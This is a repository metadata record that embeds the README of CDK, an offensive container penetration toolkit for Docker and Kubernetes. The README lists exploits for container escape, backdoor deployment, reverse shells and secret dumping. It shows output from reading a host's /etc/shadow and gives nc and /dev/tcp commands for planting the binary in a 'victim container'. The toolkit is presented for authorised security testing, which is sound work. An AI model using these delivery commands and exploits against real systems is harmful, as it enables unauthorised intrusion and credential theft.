{"id":14975801,"url":"https://github.com/cdk-team/cdk","last_synced_at":"2025-05-15T00:05:20.893Z","repository":{"id":37312599,"uuid":"310247011","full_name":"cdk-team/CDK","owner":"cdk-team","description":"๐Ÿ“ฆ Make security testing of K8s, Docker, and Containerd easier.","archived":false,"fork":false,"pushed_at":"2025-03-08T14:00:06.000Z","size":10005,"stargazers_count":4191,"open_issues_count":15,"forks_count":570,"subscribers_count":73,"default_branch":"main","last_synced_at":"2025-05-15T00:02:52.820Z","etag":null,"topics":["blackhat","cloud-native","cloud-native-security","container","container-escape","container-security","docker","exploits","hacktools","hitb","k8s","k8s-penetration-toolkit","kernel-exploitation","kubernetes","kubernetes-security","linux","penetration","penetration-testing-tools","privilege-escalation","vulnerabilities"],"latest_commit_sha":null,"homepage":"https://github.com/cdk-team/CDK/wiki","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cdk-team.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2020-11-05T09:18:51.000Z","updated_at":"2025-05-13T06:19:13.000Z","dependencies_parsed_at":"2023-11-08T05:53:29.469Z","dependency_job_id":"f288203f-4087-4a17-a249-0093e6293e75","html_url":"https://github.com/cdk-team/CDK","commit_stats":{"total_commits":190,"total_committers":25,"mean_commits":7.6,"dds":0.5526315789473684,"last_synced_commit":"5a9cda1516d4577f738394047d56c4393d04dfda"},"previous_names":["xyntax/cdk"],"tags_count":30,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cdk-team%2FCDK","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cdk-team%2FCDK/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cdk-team%2FCDK/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cdk-team%2FCDK/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cdk-team","download_url":"https://codeload.github.com/cdk-team/CDK/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254249198,"owners_count":22039029,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blackhat","cloud-native","cloud-native-security","container","container-escape","container-security","docker","exploits","hacktools","hitb","k8s","k8s-penetration-toolkit","kernel-exploitation","kubernetes","kubernetes-security","linux","penetration","penetration-testing-tools","privilege-escalation","vulnerabilities"],"created_at":"2024-09-24T13:52:38.140Z","updated_at":"2025-05-15T00:05:19.465Z","avatar_url":"https://github.com/cdk-team.png","language":"Go","readme":"\n# CDK - Zero Dependency Container Penetration Toolkit\n\nEnglish | [็ฎ€ไฝ“ไธญๆ–‡](https://github.com/cdk-team/CDK/wiki/CDK-Home-CN)\n\n![png](https://user-images.githubusercontent.com/7868679/177925206-8d83dc95-0f2f-4d61-9a45-0d43b1b0468f.png)\n\n## Legal Disclaimer\n\nUsage of CDK for attacking targets without prior mutual consent is illegal.\nCDK is for security testing purposes only.\n\n## Overview\n\nCDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.\n\n## Quick Start\n\nRun **`cdk eva`** to get evaluate info and a recommend exploit, then run **`cdk run`** to start the attack.\n\n```\n\u003e ./cdk eva --full\n\n[*] Maybe you can exploit the *Capabilities* below:\n[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.\n[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.\nCritical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.\nCritical - Possible Privileged Container Found.\n\n\u003e ./cdk run cap-dac-read-search\n\nRunning with target: /etc/shadow, ref: /etc/hostname\nubuntu:$6$*******:19173:0:99999:7:::\nroot:*:18659:0:99999:7:::\ndaemon:*:18659:0:99999:7:::\nbin:*:18659:0:99999:7:::\n```\n\n## Installation/Delivery\n\nDownload latest release in https://github.com/cdk-team/CDK/releases/\n\nDrop executable files into the target container and start testing.\n\n### TIPS: Deliver CDK into target container in real-world penetration testing\n\nIf you have an exploit that can upload a file, then you can upload CDK binary directly.\n\nIf you have a RCE exploit, but the target container has no `curl` or `wget`, you can use the following method to deliver CDK:\n\n1. First, host CDK binary on your host with public IP.\n```\n(on your host)\nnc -lvp 999 \u003c cdk\n```\n\n2. Inside the victim container execute\n```\ncat \u003c /dev/tcp/(your_public_host_ip)/(port) \u003e cdk\nchmod a+x cdk\n```\n\n## Usage\n```\nUsage:\n cdk evaluate [--full]\n cdk run (--list | \u003cexploit\u003e [\u003cargs\u003e...])\n cdk \u003ctool\u003e [\u003cargs\u003e...]\n\nEvaluate:\n cdk evaluate Gather information to find weakness inside container.\n cdk evaluate --full Enable file scan during information gathering.\n\nExploit:\n cdk run --list List all available exploits.\n cdk run \u003cexploit\u003e [\u003cargs\u003e...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki\n\nAuto Escape:\n cdk auto-escape \u003ccmd\u003e Escape container in different ways then let target execute \u003ccmd\u003e.\n\nTool:\n vi \u003cfile\u003e Edit files in container like \"vi\" command.\n ps Show process information like \"ps -ef\" command.\n nc [options] Create TCP tunnel.\n ifconfig Show network information.\n kcurl \u003cpath\u003e (get|post) \u003curi\u003e \u003cdata\u003e Make request to K8s api-server.\n ectl \u003cendpoint\u003e get \u003ckey\u003e Unauthorized enumeration of ectd keys.\n ucurl (get|post) \u003csocket\u003e \u003curi\u003e \u003cdata\u003e Make request to docker unix socket.\n probe \u003cip\u003e \u003cport\u003e \u003cparallel\u003e \u003ctimeout-ms\u003e TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000\n\nOptions:\n -h --help Show this help msg.\n -v --version Show version.\n```\n\n## Features\n\nCDK has three modules:\n\n1. Evaluate: gather information inside container to find potential weakness.\n2. Exploit: for container escaping, persistance and lateral movement\n3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.\n\n### Evaluate Module\n\nUsage\n```\ncdk evaluate [--full]\n```\nThis command will run the scripts below without local file scanning, using `--full` to enable all.\n\n|Tactics|Script|Supported|Usage/Example|\n|---|---|---|---|\n|Information Gathering|OS Basic Info|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-System-Info)|\n|Information Gathering|Available Capabilities|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities)|\n|Information Gathering|Available Linux Commands|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Commands-and-Capabilities)|\n|Information Gathering|Mounts|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Mounts)|\n|Information Gathering|Net Namespace|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Net-Namespace)|\n|Information Gathering|Sensitive ENV|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Services)|\n|Information Gathering|Sensitive Process|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Services)|\n|Information Gathering|Sensitive Local Files|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Sensitive-Files)|\n|Information Gathering|Kube-proxy Route Localnet(CVE-2020-8558)|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-check-net.ipv4.conf.all.route_localnet)|\n|Information Gathering|DNS-Based Service Discovery|โœ”|[link](https://github.com/kubernetes/dns/blob/master/docs/specification.md)|\n|Discovery|K8s Api-server Info|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server)|\n|Discovery|K8s Service-account Info|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-K8s-Service-Account)|\n|Discovery|Cloud Provider Metadata API|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-Cloud-Provider-Metadata-API)|\n\n### Exploit Module\n\nList all available exploits:\n```\ncdk run --list\n```\n\nRun targeted exploit:\n```\ncdk run \u003cscript-name\u003e [options]\n```\n\n| Tactic | Technique | CDK Exploit Name | Supported | In Thin | Doc |\n|----------------------|------------------------------------------------------------|------------------------|-----------|----------------------------------------------------------------------------|--------------------------------------------------------------------------------------|\n| Escaping | docker-runc CVE-2019-5736 | runc-pwn | โœ” | โœ” ||\n| Escaping | containerd-shim CVE-2020-15257 | shim-pwn | โœ” || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-shim-pwn) |\n| Escaping | docker.sock PoC (DIND attack) | docker-sock-check | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-check) |\n| Escaping | docker.sock RCE | docker-sock-pwn | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-pwn) |\n| Escaping | Docker API(2375) RCE | docker-api-pwn | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-api-pwn) |\n| Escaping | Device Mount Escaping | mount-disk | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-disk) |\n| Escaping | LXCFS Escaping | lxcfs-rw | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-lxcfs-rw) |\n| Escaping | Cgroups Escaping | mount-cgroup | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-cgroup) |\n| Escaping | Abuse Unprivileged User Namespace Escaping CVE-2022-0492 | abuse-unpriv-userns | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-abuse-unpriv-userns) |\n| Escaping | Procfs Escaping | mount-procfs | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-mount-procfs) |\n| Escaping | Ptrace Escaping PoC | check-ptrace | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-ptrace) |\n| Escaping | Rewrite Cgroup(devices.allow) | rewrite-cgroup-devices | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-rewrite-cgroup-devices) |\n| Escaping | Read arbitrary file from host system (CAP_DAC_READ_SEARCH) | cap-dac-read-search | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search) |\n| Discovery | K8s Component Probe | service-probe | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-service-probe) |\n| Discovery | Dump Istio Sidecar Meta | istio-check | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-check-istio) |\n| Discovery | Dump K8s Pod Security Policies | k8s-psp-dump | โœ” || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-psp-dump) |\n| Remote Control | Reverse Shell | reverse-shell | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-reverse-shell) |\n| Remote Control | Kubelet Exec | kubelet-exec | โœ” | โœ” | |\n| Credential Access | Registry BruteForce | registry-brute | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-Container-Image-Registry-Brute) |\n| Credential Access | Access Key Scanning | ak-leakage | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-ak-leakage) |\n| Credential Access | Etcd Get K8s Token | etcd-get-k8s-token | โœ” | โœ” | |\n| Credential Access | Dump K8s Secrets | k8s-secret-dump | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-secret-dump) |\n| Credential Access | Dump K8s Config | k8s-configmap-dump | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-configmap-dump) |\n| Privilege Escalation | K8s RBAC Bypass | k8s-get-sa-token | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-get-sa-token) |\n| Persistence | Deploy WebShell | webshell-deploy | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-webshell-deploy) |\n| Persistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset) |\n| Persistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | โœ” || [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver) |\n| Persistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip) |\n| Persistence | Deploy K8s CronJob | k8s-cronjob | โœ” | โœ” | [link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-cronjob) |\n\n**Note about Thin:** The **thin release** is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.\n\n### Tool Module\n\nRunning commands like in Linux, little different in input-args, see the usage link.\n```\ncdk nc [options]\ncdk ps\n```\n\n|Command|Description|Supported|Usage/Example|\n|---|---|---|---|\n|nc|TCP Tunnel|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Tool:-nc)|\n|ps|Process Information|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ps)|\n|netstat|Like \"netstat -antup\" command|โœ”||\n|ifconfig|Network Information|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ifconfig)|\n|vi|Edit Files|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Tool:-vi)|\n|ectl|Unauthorized enumeration of ectd keys|โœ”||\n|kcurl|Request to K8s api-server|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Tool:-kcurl)|\n|dcurl|Request to Docker HTTP API|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Tool:-dcurl)|\n|ucurl|Request to Docker Unix Socket|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ucurl)|\n|rcurl|Request to Docker Registry API|||\n|probe|IP/Port Scanning|โœ”|[link](https://github.com/cdk-team/CDK/wiki/Tool:-probe)|\n\n### Release Document\n\nIf you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the [Release Document](https://github.com/cdk-team/CDK/wiki/Release).\n\n## Developer Docs\n\n* [run test in container.](https://github.com/cdk-team/CDK/wiki/Run-Test)\n\n## Contributing to CDK\n\nFirst off, thanks for taking the time to contribute!\n\nThanks for the following contributors:\n\n\u003ca href=\"https://github.com/cdk-team/cdk/graphs/contributors\"\u003e\n \u003cimg src=\"https://contrib.rocks/image?repo=cdk-team/cdk\" /\u003e\n\u003c/a\u003e\n\nMore contributors๏ผš[Contributors List](thanks.md)\n\n#### Bug Reporting\n\nBugs are tracked as [GitHub Issues](https://github.com/cdk-team/CDK/issues). Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.\n\n#### Suggesting Enhancements\n\nEnhancement suggestions are tracked as [GitHub Discussions](https://github.com/cdk-team/CDK/discussions). You can publish any thoughts here to discuss with developers directly.\n\n#### Pull Requests\n\nFix problems or maintain CDK's quality:\n\n* Describe the current CDK version, environment, problem and exact steps that reproduce the problem.\n* Running screenshots or logs before and after you fix the problem.\n\nNew feature or exploits:\n\n* Explain why this enhancement would be useful to other users.\n* Please enable a sustainable environment for us to review contributions.\n* Screenshots about how this new feature works.\n* If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an [example](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-deploy).\n\n## Events\n\n### 404StarLink 2.0 - Galaxy\n![png](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)\n\nProject CDK is now included in 404Team [Starlink Project 2.0](https://github.com/knownsec/404StarLink2.0-Galaxy). Join the StarLink community to get in touch with CDK dev-team.\n\n- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)\n\n### BlackHat Asia 2021 Arsenal\n\n- [https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422](https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422)\n\n### HITB SecConf 2021 Amsterdam\n\n- [Briefing: \"Attack Cloud Native Kubernetes\"](https://conference.hitb.org/hitbsecconf2021ams/sessions/attacking-cloud-native-kubernetes-with-cdk/)\n\n\n### WHC 2021 (่กฅๅคฉ็™ฝๅธฝๅคงไผš)\n\n- [CDK: Also a Awesome BugBounty Tool for Cloud Platform](https://github.com/neargle/slidefiles/blob/main/2021%20WHC2021%20CDK-Also-a-Awesome-BugBounty-Tool-for-Cloud-Platform.pptx.pdf)\n\n### KCON 2021 Arsenal\n\n- [http://kcon.knownsec.com/2021/#/arsenal](http://kcon.knownsec.com/2021/#/arsenal)\n\n### Kubernetes community Days 2021 \n\n- [https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/](https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/)\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcdk-team%2Fcdk","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcdk-team%2Fcdk","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcdk-team%2Fcdk/lists"}